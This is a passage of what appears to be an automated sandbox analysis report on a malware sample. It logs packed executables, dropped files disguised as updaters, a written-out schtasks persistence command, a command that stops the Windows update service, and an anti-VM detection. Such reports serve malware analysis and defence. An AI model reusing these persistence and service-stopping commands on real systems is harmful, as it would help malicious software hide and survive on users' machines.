                        Source: S0FTWARE.exeStatic PE information: section name: .symtab
                        Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .00cfg
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .vmp$
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .vmp$
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .00cfg
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .eh_fram
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater[1].exe.3.drStatic PE information: section name: .eh_fram
                        Source: Updater[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                        Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                        Source: Updater.exe.20.drStatic PE information: section name: .00cfg
                        Source: Updater.exe.20.drStatic PE information: section name: .vmp$
                        Source: Updater.exe.20.drStatic PE information: section name: .vmp$
                        Source: Updater.exe.20.drStatic PE information: section name: .vmp$
                        Source: service.exe.54.drStatic PE information: section name: .eh_fram
                        Source: service.exe.54.drStatic PE information: section name: .vmp$
                        Source: service.exe.54.drStatic PE information: section name: .vmp$
                        Source: service.exe.54.drStatic PE information: section name: .vmp$
                        Source: C:\Users\user\Desktop\S0FTWARE.exeCode function: 0_3_12E9D50C push edi; ret 0_3_12E9E245
                        Source: C:\Users\user\Desktop\S0FTWARE.exeCode function: 0_3_12E9D98A push edi; ret 0_3_12E9E245
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A309C2 push ecx; ret 3_2_02A309D5
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1F635 push ecx; ret 3_2_02A1F648
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A245B9 push esi; ret 3_2_02A245BB
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D1394 push dword ptr [00016C01h]; ret 20_2_00007FF6AD6D1403
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D7EAA push edx; iretd 20_2_00007FF6AD6D7EAB
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D7E81 push ebx; iretd 20_2_00007FF6AD6D7E82
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D872E push cs; ret 20_2_00007FF6AD6D872F
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D8305 push edi; retf 20_2_00007FF6AD6D8306
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D7D8B push ecx; retn 0050h20_2_00007FF6AD6D7D8C
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6DD136 push edx; ret 20_2_00007FF6AD6DD137
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D84A6 push ds; retf 0050h20_2_00007FF6AD6D84A7
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D8470 push esp; retf 0050h20_2_00007FF6AD6D8471
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D8C46 push ebp; ret 20_2_00007FF6AD6D8C47
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D8C38 push esp; ret 20_2_00007FF6AD6D8C39
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\AAFIJKKEHJ.exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\GHDAKKJJJK.exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\NewApp[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\service.exeFile created: C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy)Jump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\ProgramData\GHDAKKJJJK.exeFile created: C:\Users\user\AppData\Roaming\service.exeJump to dropped file
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile created: C:\ProgramData\GoogleUP\Chrome\Updater.exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\AAFIJKKEHJ.exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\GHDAKKJJJK.exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile created: C:\ProgramData\GoogleUP\Chrome\Updater.exeJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\service.exeFile created: C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy)Jump to dropped file

                        Boot Survival

                        barindex
                        Monitors registry run keys for changes
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A1A132
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\GHDAKKJJJK.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\service.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
